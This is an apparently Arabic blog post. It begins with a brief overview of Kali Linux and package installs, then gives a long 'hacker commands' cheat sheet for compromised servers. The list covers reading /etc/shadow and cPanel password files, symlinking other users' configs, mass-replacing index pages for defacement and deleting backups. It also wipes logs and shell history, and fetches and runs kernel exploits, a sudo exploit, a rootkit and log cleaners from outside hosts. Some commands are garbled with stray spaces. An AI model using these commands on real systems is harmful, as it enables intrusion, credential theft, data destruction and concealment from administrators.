كالي لينكس (بالإنجليزية: Kali Linux) هي توزيعة لينكس مبنية على ديبيان، وهي متخصصة في الأمن والحماية المعلوماتية واختبار الاختراق (Penetration Testing) تم الإعلان عن صدورها في 13 مارس 2013
توزيعة كالي هي عبارة عن إعادة بناء لتوزيعة باك تراك: حيث قام المطورون ببنائها على ديبيان بدل أبونتو، وهي مدعومة وممولة من طرف Offensive Security Ltd
أدوات كالي لينكس
توزيعة كالي لينكس متخصصة في الأمن والحماية المعلوماتية وتحتوي مسبقا على عدة برامج وأدوات موجهة لاختبار الاختراق·حيث تتضمن برامج تقوم بالمسح الأمني للمنافذ كإن ماب Nmap وبرامج لتحليل الحزم المتبادلة على الشبكات كواير شارك Wireshark ، و برامج لكسر كلمات المرور كبرنامج جون ذا ريبر John the Ripper، وطقم برامج ايركراك-أن جي الخاص باختبار اختراق الشبكات المحلية اللاسلكية Wireless LANs و Burp Suite و OWASP و ZAP لفحص سلامة تطبيقات الويب، بالاضافة إلى أدوات أخرى لاختبارت أمنية متعددة
كالي لينكس والبرمجيات الحرة
كالي لينكس هي توزيعة حرة، تضم برمجيات حرة و مفتوحة المصدر تتوافق في مبدأها مع المبادئ الموجهة للبرمجيات الحرة. يمكن الحصول على التوزيعة مجانا مباشرة من موقعها الرسمي
بعد التحميل يمكن للمستعمل أن يشغل هذا النظام كقرص حي Live CD أو يو إس بي حي Live USB، أو يمكن تتثبته مباشرة على القرص الصلب للحاسوب أو استعماله كجهاز افتراضي. كما أنه يدعم استعمال منصة مشروع ميتاسبلوت و هي أدات لتنفيذ هجمات افتراضية اعتمادا على الثغرات
لكالي لينكس صورة من 32 بت و 64 بت والتي تعمل على معالجات x86، كما لديها صورة تدعم معمارية ARM لاستعمالها على الأجهزة المحمولة ذات المواصفات الضعيفة والمتوسطة كأجهزة الكروم بوك من سامسونج
كالي تعتمد على توزيعة ديبيان ويزي Wheezey. أغلب الحزم التي تستعملها كالي مأخوذة من مستودعات ديبيان
المصدر
https://www.kali.org/
اتبع
https://tecno07.com/installing-the-kali-linux-system-along-with-windows/
https://youtu.be/1HxLs2xs7CY
https://www.photoomax.com/2019/11/Explain-the-use-of-Kali-Linux-tools-for-beginners-and-advanced.html
http://www.igli5.com/search?q=kali+linux
انا للحين لم اجربه : واذا نويت راح اطبق لكم باذن الله من الصفر بشرح مفصل عكس الطروحات الغير مكتمله
نبدأ : جميع أوامر الاختراق Kali linux
بعض الصيغ المضغوطة مثل ( zip - rar - tar.gz - 7zip ) تحتاج تنصيب بعض الحزم حتى تستطيع التعامل معاها وفك الضغط عنها أو حتى لضغط بعض الملفات ولتنصيب كافة الحزم الصق هذا الأمر في الطرفية واضغط ENTER :
sudo apt-get install unace unrar zip unzip p7zip-full p7zip-rar sharutils rar uudeview mpack arj cabextract file-roller
- تثبيت مدير حزم Gdebi
sudo apt-get install gdebi
- تنصيب مشغل VLC
sudo apt-get install vlc
- تنصيب أداة معالجة الصور Gimp
sudo apt-get install gimp
- تنصيب dropbox
sudo apt-get install nautilus-dropbox
- تنصيب نظام الحماية GUFW Firewall
sudo apt-get install gufw
- مشغل الميديا الرائع MPV
sudo add-apt-repository ppa:mc3man/mpv-tests
sudo apt-get update
sudo apt-get install mpv
اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه
cat /etc/passwd | cut -d ":" -f1
1- أمر إظهار يوزرات المواقع :
ls -la /etc/valiases
او
cat /etc/passwd
او
ls /var/mail
او
cat /etc/shadow
او
cat /etc/domainalias
ln -s / etc/passwd w
يسحب لك الملف بملف أسمه w
rm angel.php <------لحذف ملف
rm -r angel<------ لحذف مجلد
find angel.php <------لعمل بحث عن ملف
find *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد
-------------------
أمر التأكد من صلاحية سحب الملفات علي السيرفر
which xxxx <------ بدل العلامات بأمر السحب
xxxx = أمر السحب
اومر السحب
wget
curl -o
get
lynx -source
-------------------
هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد boot
تقدر تغيير مجلد boot الى
-------------------
كود:
cd /boot;ls -al
etc << لفحص بعض الملفات ومنها قد تجد ثغرة confixx
usr << لمعرفة برامج السيرفر
opt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا
-------------------
last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهم
ps -ax : عرض الـ Processess
lsmod : الـ modules الموجوده في الكيرنال
uname -a : لعرض معلومات الكرنال
اوامر بسيطه
mv : تغيير الإسم
cp : نسخ ملف
cp -R : نسخ مجلد
ln : إنشاء رابط ( link ) لملف
gerp : البحث داخل ملف
-------------------
لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي :
netstat -an|grep 11457
-------------------
امر للتاكد من وجود ملف
كود:
ls file
حلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعض
ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح
كود:
ls -al file
-------------------
أوامر إحترافيه :
1- إظهار اليوزرات بشكل مرتب :
awk -F: '{ print $1 }' / etc/passwd | sort
2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي )
ps -o "%u : %U : %p : %a"
3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيس
ps -eo pid,tt,user,fname,tmout,f,wchan
4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر )
ps -U user -u user -N
5- اليوزرز المتصلين الآن
users
6- عرض آخر اليوزرز اللي دخلو :
last
7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر )
finger user
8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم
w
9- عرض البورتات المفتوحه
netstat -lnp --ip
-------------------
touch angel.php ينشئ لك ملف ضمن المجلد
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات
وال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unzip
haltsys : لاغلاق النظام
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر
whoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxx
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكس
ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب :
مثال rm --help
-------------------
أوامر رائعه :
لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john )
find /home -user john
لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم )
find $HOME -mtime 0
لمعرفة المساحه المستخدمه
df -h
لمعرفة المساحه المتبقيه
du
-------------------
وهذي مجموعة من الأوامر البسيطة
ls -m
يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات
ls -t
يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم
ls -lu
يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ)
ls -F
يظهر الملفات بأنواعها حيث :
الملفات المسبوقة ب / عبارة عن مجلدات
الملفات المسبوقة ب * عبارة عن ملفات تنفيذية
الملفات المسبوقة ب @ عبارة عن روابط
ls -S
يظهر الملفات تسلسليا من الأكبر إلى الأصغر
ls -X
يظهر الملفات ويرتبها حسب امتدادها
ls -r
يظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....)
cp
لنسخ ملف أو مجلد
mkdir
لإنشاء مجلد
mv
لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته
(مثلا
mv angel gnom
راح يعيد تسميت المجلد angel إلى gnom
أو
mv angel.php /ho me/hackteach/publi c_htm l/cc/test
راح يحول الملف angel.php من المجلد إلي هو فيه إلى المجلد الجديد test)
-------------------
ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt
راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txt
بالعربي ,, الأمر هذا هو حق السم لينك ,, symLink
-------------------
أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه :
du -s / home | sort -rn
( بدون مسافه بعد / و home )
-------------------
النسخ واللصق بهالطريقة
c p /ho me/hi.t xt /ho me/jack
أو العكس
-------------------
لعمل ماس ديفاس بعد اخذ الروت
كود PHP:
find / -name "index.*" -exec cp /t mp/index.htm
-------------------
أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) :
في أوامر كثيره .. بعضها :
find / -name service.pwd
او
cat / home/*/public_html/_vti_pvt/service.pwd
و
cat / var/cpanel/accounting.log
( لاتنسى تحذف المسافات قبل var و home )
-------------------
1- حذف ملفات اللوقو
rm -rf / tmp/logs
rm -rf $HISTFILE
rm -rf / root/.ksh_history
rm -rf / root/.bash_history
rm -rf / root/.ksh_history
rm -rf / root/.bash_logout
rm -rf / usr/local/apache/logs
rm -rf / usr/local/apache/log
rm -rf / var/apache/logs
rm -rf / var/apache/log
rm -rf / var/run/utmp
rm -rf / var/logs
rm -rf / var/log
rm -rf / var/adm
rm -rf / etc/wtmp
rm -rf / etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
-------------------
2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن )
cat / dev/null > / var/log/kdebug
cat / dev/null > / var/log/kernel
cat / dev/null > / var/log/maillog
cat / dev/null > / var/log/messages
cat / dev/null > / var/log/secure
cat / dev/null > / var/log/svclog
cat / dev/null > / var/log/tcdebuglog
cat / dev/null > / var/log/tclient
cat / dev/null > / var/log/tivoLog.prv
cat / dev/null > / var/log/tivoLog.pub
cat / dev/null > / var/log/tivoweb.log
cat / dev/null > / var/log/tvdebuglog
cat / dev/null > / var/log/tverr
cat / dev/null > / var/log/tvlog
3- أمر قرائة ملف الكونفيج على السيرفر
cat / usr/local/apache/conf/httpd.conf
4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها )
find / -type f -perm -04000 -ls
-------------------
5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها )
find / -type f -perm -02000 -ls
6- أوامر عرض المجلدات المصرح لها تصريح 777
find / -perm -2 -ls
find / -type d -perm 0777 | xargs ls -alld
find / -type d -pem -2 -ls
7- أمر حذف جميع الباك آب الموجوده على السيرفر
find / -name "cpbackup*" -exec rm {} ;
find / -name "backup*" -exec rm {} ;
8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي
find / -name "index.*" -exec cp index.htm {} ;
find / -name "default.*" -exec cp index.htm {} ;
9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر )
find / -name "index.*" -exec chown 99 index.html {} ;
find / -name "default.*" -exec chown 99 index.html {} ;
10- أمر عرض System log
cat / etc/syslog.conf
11- أمر عرض معلومات عن الذاكره
cat / proc/meminfo
12- أمر تعديل دوال php والسيف مود وغيرها
pico / usr/local/lib/php.ini
13- أمر عرض البورتات المفتوحه
netstat -atup | grep IST
14- أمر عرض آخر إتصال
lastlog
15- أمر عرض اليوزرات المتصله
w
-------------------
16- أمر لمعرفة إصدار الكيرنال
dpkg --list | grep linux-image
rpm -q kernel : kernel-2.6.18-53.1.4.el5
uname -s : SunOS
uname -r : 2.6.22-14-EL5
uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64
cat / proc/version : Linux version 2.6.18-53.1.4.el5 (b@redhat.com) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 2007
17- أمر إيقاف process معين عن العمل
kill -9 PID
kill PID
مع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمر
ps ux
ps aux
top
18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها )
find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null
19- أمر عرض اليوزرات اللتي لا تحتوي على باسورد
cut -d: -f1,2,3 / etc/passwd | grep
-------------------
20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etc
find / etc/ -type f -perm -o+w 2> / dev/null
21- أمر عرض أوامر السحب المفعله كـ wget
which wget curl w3m lynx
22- أمر عرض معلومات عن المعالج CPUINFO
cat / proc/version / proc/cpuinfo
23- أمر عرض مساحات الهاردسك
du
( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه )
du -s / home/user | sort -rn
df -Th
24- أمر التأكد من وجود المترجم gcc
locate gcc
25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن )
wget No Results Found Packet Storm | gcc zap2.c -o zap2 | ./zap2
26- أمر تنفيذ بعض الهجمات على الكيرنال
wget http://ftp.powernet.com.tr/supermail/debug/k3 | ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5
27- إستخدام ثغرة stack overflow عن طريق sudo
wget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit
28- أمر تثبيت روت كت لإصدار 2.6
wget twofaced.org | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel
29- أمر استخدام سكربت Mig LogCleaner
wget twofaced.org | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0
30- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يوم
find / -mtime x
( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin )
31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يوم
find / -ctime x
32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذها
find / -perm +4000 -user root
33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليها
find / -perm +002 -user root
34- للبحث عن الملفات اللتي ليس لديها مالك
find / -nouser
35- للبحث عن الملفات اللتي مالكها هو اليوزر root
find / -user root
36- من الأوامر التفصيليه لـ find
find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;
شرح الأمر :
ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txt
وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر root
وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي
يستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- )
-------------------
37- وتستطيع إستخدام أمر find بشكل آخر .. مثل : find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \; شرح الأمر : عرض جميع الملفات فقط .. اللتي لديها خاصيتي
ويوجد الكثير بس ما ابي اخرب المدونه باكواد تضرني
وسلامتكم